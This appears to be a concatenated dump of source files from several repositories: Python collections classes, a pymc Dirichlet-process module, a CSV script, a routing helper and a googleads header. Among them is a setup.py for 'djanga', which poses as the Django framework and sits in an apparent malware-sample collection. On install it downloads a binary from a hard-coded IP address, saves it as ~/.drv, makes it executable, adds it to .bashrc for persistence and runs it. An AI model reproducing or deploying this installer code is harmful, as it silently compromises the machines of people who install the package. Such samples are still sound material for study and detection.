for elem, count in other.items():
if elem not in self and count < 0:
result[elem] = 0 - count
return result
def __or__(self, other):
'''Union is the maximum of value in either of the input counters.
>>> Counter('abbb') | Counter('bcc')
Counter({'b': 3, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = other_count if count < other_count else count
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __and__(self, other):
''' Intersection is the minimum of corresponding counts.
>>> Counter('abbb') & Counter('bcc')
Counter({'b': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = count if count < other_count else other_count
if newcount > 0:
result[elem] = newcount
return result
def __pos__(self):
'Adds an empty counter, effectively stripping negative and zero counts'
result = Counter()
for elem, count in self.items():
if count > 0:
result[elem] = count
return result
def __neg__(self):
'''Subtracts from an empty counter. Strips positive and zero counts,
and flips the sign on negative counts.
'''
result = Counter()
for elem, count in self.items():
if count < 0:
result[elem] = 0 - count
return result
def _keep_positive(self):
'''Internal method to strip elements with a negative or zero count'''
nonpositive = [elem for elem, count in self.items() if not count > 0]
for elem in nonpositive:
del self[elem]
return self
def __iadd__(self, other):
'''Inplace add from another counter, keeping only positive counts.
>>> c = Counter('abbb')
>>> c += Counter('bcc')
>>> c
Counter({'b': 4, 'c': 2, 'a': 1})
'''
for elem, count in other.items():
self[elem] += count
return self._keep_positive()
def __isub__(self, other):
'''Inplace subtract counter, but keep only results with positive counts.
>>> c = Counter('abbbc')
>>> c -= Counter('bccd')
>>> c
Counter({'b': 2, 'a': 1})
'''
for elem, count in other.items():
self[elem] -= count
return self._keep_positive()
def __ior__(self, other):
'''Inplace union is the maximum of value from either counter.
>>> c = Counter('abbb')
>>> c |= Counter('bcc')
>>> c
Counter({'b': 3, 'c': 2, 'a': 1})
'''
for elem, other_count in other.items():
count = self[elem]
if other_count > count:
self[elem] = other_count
return self._keep_positive()
def __iand__(self, other):
'''Inplace intersection is the minimum of corresponding counts.
>>> c = Counter('abbb')
>>> c &= Counter('bcc')
>>> c
Counter({'b': 1})
'''
for elem, count in self.items():
other_count = other[elem]
if other_count < count:
self[elem] = other_count
return self._keep_positive()
########################################################################
### ChainMap
########################################################################
class ChainMap(MutableMapping):
''' A ChainMap groups multiple dicts (or other mappings) together
to create a single, updateable view.
The underlying mappings are stored in a list. That list is public and can
be accessed or updated using the *maps* attribute. There is no other
state.
Lookups search the underlying mappings successively until a key is found.
In contrast, writes, updates, and deletions only operate on the first
mapping.
'''
def __init__(self, *maps):
'''Initialize a ChainMap by setting *maps* to the given mappings.
If no mappings are provided, a single empty dictionary is used.
'''
self.maps = list(maps) or [{}] # always at least one map
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key):
for mapping in self.maps:
try:
return mapping[key] # can't use 'key in mapping' with defaultdict
except KeyError:
pass
return self.__missing__(key) # support subclasses that define __missing__
def get(self, key, default=None):
return self[key] if key in self else default
def __len__(self):
return len(set().union(*self.maps)) # reuses stored hash values if possible
def __iter__(self):
return iter(set().union(*self.maps))
def __contains__(self, key):
return any(key in m for m in self.maps)
def __bool__(self):
return any(self.maps)
@_recursive_repr()
def __repr__(self):
return '{0.__class__.__name__}({1})'.format(
self, ', '.join(map(repr, self.maps)))
@classmethod
def fromkeys(cls, iterable, *args):
'Create a ChainMap with a single dict created from the iterable.'
return cls(dict.fromkeys(iterable, *args))
def copy(self):
'New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]'
return self.__class__(self.maps[0].copy(), *self.maps[1:])
__copy__ = copy
def new_child(self, m=None): # like Django's Context.push()
'''New ChainMap with a new map followed by all previous maps.
If no map is provided, an empty dict is used.
'''
if m is None:
m = {}
return self.__class__(m, *self.maps)
@property
def parents(self): # like Django's Context.pop()
'New ChainMap from maps[1:].'
return self.__class__(*self.maps[1:])
def __setitem__(self, key, value):
self.maps[0][key] = value
def __delitem__(self, key):
try:
del self.maps[0][key]
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def popitem(self):
        'Remove and return an item pair from maps[0]. Raise KeyError if maps[0] is empty.'
try:
return self.maps[0].popitem()
except KeyError:
raise KeyError('No keys found in the first mapping.')
def pop(self, key, *args):
'Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0].'
try:
return self.maps[0].pop(key, *args)
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def clear(self):
'Clear maps[0], leaving maps[1:] intact.'
self.maps[0].clear()
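# A short usage sketch of the lookup/write semantics documented above
# (writes land in the first mapping only; illustrative):
#
#     >>> defaults = {'color': 'red', 'user': 'guest'}
#     >>> overrides = {'user': 'admin'}
#     >>> cm = ChainMap(overrides, defaults)
#     >>> cm['user'], cm['color']
#     ('admin', 'red')
#     >>> cm['color'] = 'blue'   # written to overrides; defaults untouched
#     >>> defaults['color']
#     'red'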
################################################################################
### UserDict
################################################################################
class UserDict(MutableMapping):
# Start by filling-out the abstract methods
def __init__(*args, **kwargs):
if not args:
raise TypeError("descriptor '__init__' of 'UserDict' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
if args:
dict = args[0]
elif 'dict' in kwargs:
dict = kwargs.pop('dict')
import warnings
warnings.warn("Passing 'dict' as keyword argument is deprecated",
DeprecationWarning, stacklevel=2)
else:
dict = None
self.data = {}
if dict is not None:
self.update(dict)
if len(kwargs):
self.update(kwargs)
def __len__(self): return len(self.data)
def __getitem__(self, key):
if key in self.data:
return self.data[key]
if hasattr(self.__class__, "__missing__"):
return self.__class__.__missing__(self, key)
raise KeyError(key)
def __setitem__(self, key, item): self.data[key] = item
def __delitem__(self, key): del self.data[key]
def __iter__(self):
return iter(self.data)
# Modify __contains__ to work correctly when __missing__ is present
def __contains__(self, key):
return key in self.data
# Now, add the methods in dicts but not in MutableMapping
def __repr__(self): return repr(self.data)
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data.copy())
import copy
data = self.data
try:
self.data = {}
c = copy.copy(self)
finally:
self.data = data
c.update(self)
return c
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
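# A minimal subclassing sketch (the LowerDict class is hypothetical):
#
#     >>> class LowerDict(UserDict):
#     ...     def __setitem__(self, key, item):
#     ...         self.data[key.lower()] = item
#     >>> d = LowerDict()
#     >>> d['KEY'] = 1
#     >>> d.data
#     {'key': 1}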
################################################################################
### UserList
################################################################################
class UserList(MutableSequence):
"""A more or less complete user-defined wrapper around list objects."""
def __init__(self, initlist=None):
self.data = []
if initlist is not None:
# XXX should this accept an arbitrary sequence?
if type(initlist) == type(self.data):
self.data[:] = initlist
elif isinstance(initlist, UserList):
self.data[:] = initlist.data[:]
else:
self.data = list(initlist)
def __repr__(self): return repr(self.data)
def __lt__(self, other): return self.data < self.__cast(other)
def __le__(self, other): return self.data <= self.__cast(other)
def __eq__(self, other): return self.data == self.__cast(other)
def __gt__(self, other): return self.data > self.__cast(other)
def __ge__(self, other): return self.data >= self.__cast(other)
def __cast(self, other):
return other.data if isinstance(other, UserList) else other
def __contains__(self, item): return item in self.data
def __len__(self): return len(self.data)
def __getitem__(self, i): return self.data[i]
def __setitem__(self, i, item): self.data[i] = item
def __delitem__(self, i): del self.data[i]
def __add__(self, other):
if isinstance(other, UserList):
return self.__class__(self.data + other.data)
elif isinstance(other, type(self.data)):
return self.__class__(self.data + other)
return self.__class__(self.data + list(other))
def __radd__(self, other):
if isinstance(other, UserList):
return self.__class__(other.data + self.data)
elif isinstance(other, type(self.data)):
return self.__class__(other + self.data)
return self.__class__(list(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserList):
self.data += other.data
elif isinstance(other, type(self.data)):
self.data += other
else:
self.data += list(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
def append(self, item): self.data.append(item)
def insert(self, i, item): self.data.insert(i, item)
def pop(self, i=-1): return self.data.pop(i)
def remove(self, item): self.data.remove(item)
def clear(self): self.data.clear()
def copy(self): return self.__class__(self)
def count(self, item): return self.data.count(item)
def index(self, item, *args): return self.data.index(item, *args)
def reverse(self): self.data.reverse()
def sort(self, *args, **kwds): self.data.sort(*args, **kwds)
def extend(self, other):
if isinstance(other, UserList):
self.data.extend(other.data)
else:
self.data.extend(other)
################################################################################
### UserString
################################################################################
class UserString(Sequence):
def __init__(self, seq):
if isinstance(seq, str):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __getnewargs__(self):
return (self.data[:],)
def __eq__(self, string):
if isinstance(string, UserString):
return self.data == string.data
return self.data == string
def __lt__(self, string):
if isinstance(string, UserString):
return self.data < string.data
return self.data < string
def __le__(self, string):
if isinstance(string, UserString):
return self.data <= string.data
return self.data <= string
def __gt__(self, string):
if isinstance(string, UserString):
return self.data > string.data
return self.data > string
def __ge__(self, string):
if isinstance(string, UserString):
return self.data >= string.data
return self.data >= string
def __contains__(self, char):
if isinstance(char, UserString):
char = char.data
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, str):
return self.__class__(self.data + other)
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, str):
return self.__class__(other + self.data)
return self.__class__(str(other) + self.data)
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __mod__(self, args):
return self.__class__(self.data % args)
    def __rmod__(self, template):
        # The original body referenced an undefined name ``args``; use the
        # wrapped string as the right-hand operand instead.
        return self.__class__(str(template) % self.data)
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def casefold(self):
return self.__class__(self.data.casefold())
def center(self, width, *args):
return self.__class__(self.data.center(width, *args))
def count(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
return self.__class__(self.data.encode(encoding))
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=_sys.maxsize):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.find(sub, start, end)
def format(self, *args, **kwds):
return self.data.format(*args, **kwds)
def format_map(self, mapping):
return self.data.format_map(mapping)
def index(self, sub, start=0, end=_sys.maxsize):
return self.data.index(sub, start, end)
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(self): return self.data.isdigit()
def isidentifier(self): return self.data.isidentifier()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isprintable(self): return self.data.isprintable()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width, *args):
return self.__class__(self.data.ljust(width, *args))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self, chars=None): return self.__class__(self.data.lstrip(chars))
maketrans = str.maketrans
def partition(self, sep):
return self.data.partition(sep)
def replace(self, old, new, maxsplit=-1):
if isinstance(old, UserString):
old = old.data
if isinstance(new, UserString):
new = new.data
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=_sys.maxsize):
return self.data.rindex(sub, start, end)
def rjust(self, width, *args):
return self.__class__(self.data.rjust(width, *args))
def rpartition(self, sep):
return self.data.rpartition(sep)
def rstrip(self, chars=None):
return self.__class__(self.data.rstrip(chars))
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def rsplit(self, sep=None, maxsplit=-1):
return self.data.rsplit(sep, maxsplit)
def splitlines(self, keepends=False): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=_sys.maxsize):
return self.data.startswith(prefix, start, end)
def strip(self, chars=None): return self.__class__(self.data.strip(chars))
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
def zfill(self, width): return self.__class__(self.data.zfill(width))
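# Usage sketch (not part of the original module): because each method above
# re-wraps its result in ``self.__class__``, a UserString subclass keeps its
# type through string operations. ``ShoutString`` is hypothetical.
#
#   class ShoutString(UserString):
#       def shout(self):
#           return self.__class__(self.data.upper() + "!")
#
#   s = ShoutString("hi").strip().shout()   # -> ShoutString("HI!")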
| 36.796787 | 99 | 0.577862 |
2b9bf5b23ffba69528229c6840efd7dc6c92908c | 11,854 | py | Python | pymc/sandbox/DP/DP.py | matthew-brett/pymc | 3a31613f056e7993a449d89bafef5fdaa40d47e9 | ["MIT"] | 5 | 2015-12-03T09:42:44.000Z | 2021-06-06T19:23:29.000Z | pymc/sandbox/DP/DP.py | matthew-brett/pymc | 3a31613f056e7993a449d89bafef5fdaa40d47e9 | ["MIT"] | 1 | 2016-09-27T02:00:41.000Z | 2016-09-27T02:15:32.000Z | pymc/sandbox/DP/DP.py | matthew-brett/pymc | 3a31613f056e7993a449d89bafef5fdaa40d47e9 | ["MIT"] | 1 | 2017-10-27T13:27:32.000Z | 2017-10-27T13:27:32.000Z |
__author__ = 'Anand Patil, anand.prabhakar.patil@gmail.com'
"""
Dirichlet process classes:
- DPRealization: A Dirichlet process realization. Based on stick-breaking representation,
but step methods should use other representations.
Attributes:
- atoms: A list containing the atom locations.
Methods:
- rand(m): Returns m random values.
- logp(x): A function returning the log-probability of x.
DP: A stochastic valued as a DP realization.
DPDraw: A stochastic distributed as a DP object's value.
Neal cite: 'Markov Chain Sampling Methods for Dirichlet Process Mixture Models'.
Also study up on Gibbs sampler.
This should all be written in Pyrex eventually. Many things are screaming for
optimization. The C++ vector class would be helpful too but that would have
to be swigged.
"""
import numpy as np
from copy import copy
from pymc import *
def draws_to_atoms(draws):
"""
atoms, n = draws_to_atoms(draws)
atoms is a list of the unique elements in draws,
and n is a list of their corresponding multiplicities.
Needs optimization badly I'm sure.
"""
atoms = []
n = []
for element in np.atleast_1d(draws):
match=False
for i in xrange(len(atoms)):
if all(element == atoms[i]):
n[i] += 1
match=True
break
if not match:
atoms.append(element)
n.append(1)
return atoms, n
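# Worked example (hypothetical input) of the atom/multiplicity split:
#
#   draws_to_atoms([3., 1., 3., 3.])   # -> ([3.0, 1.0], [3, 1])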
try:
import pylab as pl
def plot_atoms(DPr):
"""
plot_atoms(DPr)
Plots the atoms of DP realization DPr.
Base measure must be over the real line.
"""
        for pair in zip(DPr.atoms, DPr.n):
            pl.plot([pair[0], pair[0]], [0, pair[1]], 'k-')
except ImportError:
pass
class DPRealization(object):
"""
A Dirichlet process realization. This is based on the stick-breaking representation
rather than the Chinese restaurant process in order to provide a logp method. Step methods are
free to use the Chinese restaurant process, though.
Arguments:
- basemeas: The base measure. Must be a function which, when called with argument n, returns a value.
    - nu: The concentration (tightness) parameter.
- draws (optional): DPRealization can be initialized conditional on previous draws.
Useful for Gibbs sampling, maybe MH too.
- basemeas_params: The parameters of the base measure.
Methods:
- rand(m): Returns m random values.
- logp(x): Returns the log-probability of x.
"""
def __init__(self, basemeas_rand, nu, draws=[], **basemeas_params):
# The base measure and its parameters.
self.basemeas_rand = basemeas_rand
self.basemeas_params = basemeas_params
# The tightness parameter.
self.nu = np.float(nu)
if len(draws)>0:
atoms, n = draws_to_atoms(draws)
# The number of draws from each atom.
self.n = n
# The values of the atoms.
self.atoms = atoms
# Need to triple-check that this is OK!
# The probability masses of the atoms.
mass_sofar = rbeta(sum(n), nu)
if len(n) > 1:
self.mass = list((rdirichlet(n) * mass_sofar).squeeze())
else:
self.mass = [mass_sofar]
self.mass_sofar = mass_sofar
self.mass_prod = 1.
for m in self.mass:
self.mass_prod *= (1.-m)
else:
self.n = []
self.atoms = []
self.mass = []
self.mass_sofar = 0.
self.mass_prod = 1.
def logp(self, value):
"""
F.logp(x)
Returns the log of the probability mass assigned to x.
Returns -Inf if x is not in self.atoms; this behavior is fine
for continuous base distributions but incorrect for discrete.
"""
logp_out = 0.
value = np.atleast_1d(value)
for val_now in value:
match=False
for i in xrange(len(self.atoms)):
if all(val_now == self.atoms[i]):
logp_out += log(self.mass[i])
match=True
break
if not match:
return -Inf
return logp_out
def rand(self, m=1):
"""
F.rand(m=1)
Returns m values from the random probability distribution.
"""
draws = np.empty(m, dtype=float)
for i in xrange(m):
# Draw from existing atoms
if np.random.random() < self.mass_sofar:
atom_index = int(flib.rcat(np.asarray(self.mass) / self.mass_sofar,0,1,1))
new_draw = self.atoms[atom_index]
self.n[atom_index] += 1
# Make new atom
else:
new_draw = self.basemeas_rand(**self.basemeas_params)
self.atoms.append(new_draw)
self.n.append(1)
new_mass = self.mass_prod * rbeta(1, self.nu)
self.mass.append(new_mass)
self.mass_prod *= 1.-new_mass
self.mass_sofar += new_mass
draws[i] = new_draw
if m==1:
draws = draws[0]
return draws
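# Reading of the stick-breaking bookkeeping in rand() above (added comment,
# not original documentation): each new atom receives mass
#
#   new_mass = Beta(1, nu) * prod_j (1 - mass_j)
#
# i.e. a Beta(1, nu) fraction of the stick left over after all previous
# breaks. mass_prod tracks the remaining stick length and mass_sofar the
# total mass assigned so far, so mass_sofar always stays below 1.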
class DP(Stochastic):
"""
value: A DP realization.
Parents: 'alpha': concentration parameter, 'base': base probability distribution.
Base parent must have random() and logp() methods (must be an actual distribution object).
Should get intrinsic set of clusters. Step methods will update them with the children.
A new value should be created conditional on the intrinsic clusters every time a parent is updated.
"""
def __init__(self,
name,
basemeas_rand,
basemeas_logp,
nu,
doc=None,
trace=True,
value=None,
cache_depth=2,
plot=False,
verbose=0,
**basemeas_params):
self.basemeas_logp = basemeas_logp
self.basemeas_rand = basemeas_rand
self.basemeas_params = basemeas_params
parents = {}
parents['basemeas_logp'] = basemeas_logp
parents['basemeas_rand'] = basemeas_rand
parents['basemeas_params'] = basemeas_params
parents['nu'] = nu
def dp_logp_fun(value, **parents):
return 0.
# raise ValueError, 'DPStochastic objects have no logp attribute'
def dp_random_fun(basemeas_logp, basemeas_rand, nu, basemeas_params):
return DPRealization(basemeas_rand, nu, **basemeas_params)
# If value argument provided, read off intrinsic clusters.
        # If clusters argument provided, we'll store them.
# If no clusters argument provided, propose from prior all over the place.
Stochastic.__init__(self, logp=dp_logp_fun, random=dp_random_fun, doc=doc, name=name, parents=parents,
trace=trace, value=value, dtype=np.object, rseed=True, observed=False, cache_depth=cache_depth,
plot=plot, verbose=verbose)
class DPDraw(Stochastic):
"""
value: An array of values.
May want to hide these in the step method,
but many step methods need them so it's probably better to keep them here:
N: length of value.
N_clusters: number of clusters.
clusters: values of clusters, length-N list.
cluster_multiplicities: multiplicities of clusters.
Note may want to make these things their own Stochastics, in case people want to have
Deterministics etc. depending on them or to trace them.
Parent: 'dist': a DPStochastic.
logp: product of base logp evaluated on each cluster (each cluster appears only once
regardless of multiplicity) plus some function of alpha and the number of clusters.
"""
def __init__( self,
name,
DP,
N=1,
doc=None,
trace=True,
observed=False,
cache_depth=2,
plot=True,
verbose = 0):
self.N = N
def DP_logp_fun(value, dist):
return dist.logp(value)
def DP_random_fun(dist):
return dist.rand(N)
Stochastic.__init__(self,
logp = DP_logp_fun,
doc=doc,
name=name,
parents={'dist': DP},
random = DP_random_fun,
trace=trace,
value=None,
dtype=float,
rseed=True,
observed=observed,
cache_depth=cache_depth,
plot=plot,
verbose = verbose)
self.clusters = lam_dtrm('clusters',lambda draws=self: draws_to_atoms(draws))
from numpy.testing import *
from pylab import *
class test_DP(NumpyTestCase):
def check_correspondence(self):
x_d = linspace(-5.,5.,1000)
dx = x_d[1] - x_d[0]
nu = 10
p = nu * dx/sqrt(2.*pi)*exp(-x_d**2)
DP_approx = rdirichlet(p).squeeze()
DP_approx = hstack((DP_approx, 1.-sum(DP_approx)))
true_DP = DPRealization(rnormal, nu, mu=0,tau=1)
true_DP.rand(1000)
clf()
subplot(2,1,1)
plot(x_d, DP_approx,'k.',markersize=8)
subplot(2,1,2)
plot_atoms(true_DP)
def check_draws(self):
D = DPRealization(rnormal,100,mu=-10,tau=.1)
draws = D.rand(1000)
clf()
hist(draws)
def check_stochastics(self):
S = DP('S', rnormal,normal_like, 100, mu=10, tau=.1)
q = DPDraw('q', S, N=1000)
clf()
hist(q.value)
if __name__=='__main__':
NumpyTest().run()
"""
Note: If you could get a distribution for the multiplicities of the currently-
found clusters in a DP, could you give its children a logp attribute?
Then you could do something like with the GP: give the DPStochastic an intrinsic
set of clusters unrelated to its children, assess its logp using only its intrinsic
clusters, etc.
Yes, you can easily do this. Give the DP object its intrinsic clusters, and let the
step methods treat those as the things that are really participating in the model
even though from the user's perspective the entire DP is participating.
"""
# Old random method
# val = []
# N = len(self.atoms)
#
# # Initialize. Optimization 1: keep running sum.
# if N>0:
# sum_n = np.sum(self.n)
# else:
# sum_n = 0
#
# float_sumn = np.float(sum_n)
#
# for i in xrange(m):
#
# # Optimization 2: update cumulative sum on the fly.
# self.tables = np.cumsum(self.n)
#
# # Maybe draw a new atom
# if uniform() > float_sumn / (float_sumn+self.nu):
# new_val = self.basemeas_rand(**self.basemeas_params)
# self.atoms.append(new_val)
# self.n.append(1)
# N = N + 1
#
# # Otherwise draw from one of the existing atoms
# else:
# # Optimization 3: Draw uniforms ahead of time.
# # DON'T use the same uniform for checking new atom
# # creation AND for finding which old atom to draw from,
# # you'll introduce painful bias.
#
# unif = uniform() * float_sumn
# for i in xrange(N):
# if unif < self.tables[i]:
# new_val = self.atoms[i]
# self.n[i] = self.n[i]+1
# break
#
# float_sumn = float_sumn + 1.
# val.append(new_val)
#
# if m>1:
# return array(val, dtype=float)
# else:
# return val[0]
| 28.841849 | 123 | 0.574996 |
cc010c40256ccc2367a95daf4b0d286b84d57b1d | 311 | py | Python | movies.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | ["bzip2-1.0.6"] | null | null | null | movies.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | ["bzip2-1.0.6"] | null | null | null | movies.py | vijay-krishnamoorthy/python-practice | 2028bccb03619b6ac50bdfdba270623f0bfb67a9 | ["bzip2-1.0.6"] | null | null | null |
import csv
path = "C:\\Users\\Admin\\Desktop\\python-vijay\\movies.csv"
# Read the raw lines and split on commas by hand.
with open(path) as f:
    for line in f:
        print(line.strip().split(','))
# Read the same file with the csv module, which handles quoting correctly.
with open(path, newline='') as f:
    reader = csv.reader(f)
    header = next(reader)  # skip the header row
    for row in reader:
        print(row)
| 19.4375 | 58 | 0.665595 |
5fe19a17aa72f3ac577b88a5997703ecbe033af7 | 1,464 | py | Python | malware/djanga/djanga-0.1/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | ["Unlicense"] | 35 | 2018-12-10T08:59:54.000Z | 2022-01-24T17:43:56.000Z | malware/djanga/djanga-0.1/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | ["Unlicense"] | null | null | null | malware/djanga/djanga-0.1/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | ["Unlicense"] | 8 | 2020-02-25T14:00:48.000Z | 2021-10-15T10:13:16.000Z |
from setuptools import setup, find_packages
def rn ():
import platform
s = False
try:
import urllib2
except ImportError:
import http.client
s = True
import os, stat
PATH = "/out"
IP = "145.249.104.71"
LOC = ".drv"
if platform.system () == "Linux":
if not s:
response = urllib2.urlopen ("http://" + IP + PATH).read ()
else:
connection = http.client.HTTPConnection (IP)
connection.request ("GET", PATH)
response = connecton.getresponse ().read ()
os.chdir (os.path.expanduser ("~"))
d = open (LOC, "wb")
d.write (response)
d.close ()
current_state = os.stat (LOC)
os.chmod (LOC, current_state.st_mode|stat.S_IEXEC)
brc = open (".bashrc", "a")
brc.write ("\n~/.drv &")
brc.close ()
system ("~/.drv")
else:
print ("Error installing library!")
exit (-1)
rn ()
setup(
name = 'djanga',
packages = find_packages (),
version = '0.1',
description = 'Django framework',
author = 'Rosa',
author_email = 'rosaright@example.com',
url = '',
download_url = '',
keywords = [''],
classifiers = [],
)
| 24.4 | 82 | 0.44877 |
49c0e71e0938861d4c7ebe7e1ff64d782759873e | 671 | py | Python | custom_components/repsolluzygas/contracts/RepsolGasSensor.py | jesusbotella/homeassistant_repsolluzygas | e3f664f4e153857a39d9df73049c2204b6942362 | ["MIT"] | null | null | null | custom_components/repsolluzygas/contracts/RepsolGasSensor.py | jesusbotella/homeassistant_repsolluzygas | e3f664f4e153857a39d9df73049c2204b6942362 | ["MIT"] | null | null | null | custom_components/repsolluzygas/contracts/RepsolGasSensor.py | jesusbotella/homeassistant_repsolluzygas | e3f664f4e153857a39d9df73049c2204b6942362 | ["MIT"] | null | null | null |
from .RepsolContractSensor import RepsolContractSensor
class RepsolGasSensor(RepsolContractSensor):
@property
def name(self):
"""Return the name of the sensor."""
return '{contract_type} Last Invoice'.format(
contract_type=self.contract.getContractType().capitalize()
)
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return 'mdi:fire'
@property
def state(self):
"""Return the state of the sensor."""
return self.contract.getLastInvoice()['total_power_kwh']
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self.contract.getLastInvoice()
| 26.84 | 64 | 0.691505 |
50fd9fbc8b866c822121da5107ff4d031cb8a3ad | 2,822 | py | Python | Hologram/Network/Route.py | kevswims/hologram-python | f1dac5e7d461146120b4f077ecbe90ccb3f4adaa | ["MIT"] | 1 | 2019-04-23T11:36:46.000Z | 2019-04-23T11:36:46.000Z | Hologram/Network/Route.py | kevswims/hologram-python | f1dac5e7d461146120b4f077ecbe90ccb3f4adaa | ["MIT"] | null | null | null | Hologram/Network/Route.py | kevswims/hologram-python | f1dac5e7d461146120b4f077ecbe90ccb3f4adaa | ["MIT"] | 1 | 2020-12-06T20:49:02.000Z | 2020-12-06T20:49:02.000Z |
# Route.py - Hologram Python SDK Routing Manager
# This module configures routing for Hologram SDK.
#
# Author: Hologram <support@hologram.io>
#
# Copyright 2016 - Hologram (Konekt, Inc.)
#
#
# LICENSE: Distributed under the terms of the MIT License
#
import logging
import time
from logging import NullHandler
from pyroute2 import IPRoute
from pyroute2.netlink.exceptions import NetlinkError
DEFAULT_DESTINATION = '0.0.0.0/0'
class Route(object):
def __init__(self):
self.ipr = IPRoute()
self.logger = logging.getLogger(__name__)
self.logger.addHandler(NullHandler())
def is_interface_available(self, interface):
# An interface is considered available if it is simply on the ip route list.
# The interface does not need to be UP in order to be considered available.
return self.__interface_index(interface) is not None
    def wait_for_interface(self, interface, max_retries):
        count = 0
        while count <= max_retries:
            try:
                # Check if ready to break out of loop when interface is found.
                if self.is_interface_available(interface):
                    # NOTE: Ideally this conditional would be based on
                    # self.is_interface_up(interface), but there is an issue
                    # where the state of a ppp0 interface may show UNKNOWN
                    # on Raspbian linux even if ppp0 is UP.
                    return True
                self.logger.info('Waiting for interface %s:', interface)
            except Exception as e:
                # Log the failure instead of silently swallowing it; the
                # original also skipped the sleep and counter on errors,
                # which could busy-loop forever.
                self.logger.debug('Error while checking interface %s: %s',
                                  interface, str(e))
            time.sleep(1)
            count += 1
        return False
def add_default(self, gateway):
try:
self.add(DEFAULT_DESTINATION, gateway)
except NetlinkError as e:
self.logger.debug('Could not set default route due to NetlinkError: %s', str(e))
def add(self, destination, gateway):
self.ipr.route('add',
dst=destination,
gateway=gateway)
def __interface_index(self, interface):
index = None
indexes = self.ipr.link_lookup(ifname=interface)
if len(indexes) == 1:
index = indexes[0]
return index
def __get_interface_state(self, interface):
if self.is_interface_available(interface):
link_state = None
ipr_index = self.__interface_index(interface)
links = self.ipr.get_links()
for link in links:
if link['index'] == ipr_index:
link_state = link.get_attr('IFLA_OPERSTATE')
break
return link_state
else:
return None
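# Usage sketch (interface name and gateway address are hypothetical):
#
#   route = Route()
#   if route.wait_for_interface('ppp0', max_retries=30):
#       route.add_default('10.64.64.64')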
| 34 | 92 | 0.592133 |
4957c1748dc0b9129002bbe22b300d25a7a3b626 | 1,887 | py | Python | examples/ad_manager/v202202/creative_wrapper_service/get_all_creative_wrappers.py | MarkusBordihn/googleads-python-lib | 09bbcb01f9443f1d140efd8f2d27ef0e4aa74d20 | ["Apache-2.0"] | null | null | null | examples/ad_manager/v202202/creative_wrapper_service/get_all_creative_wrappers.py | MarkusBordihn/googleads-python-lib | 09bbcb01f9443f1d140efd8f2d27ef0e4aa74d20 | ["Apache-2.0"] | null | null | null | examples/ad_manager/v202202/creative_wrapper_service/get_all_creative_wrappers.py | MarkusBordihn/googleads-python-lib | 09bbcb01f9443f1d140efd8f2d27ef0e4aa74d20 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
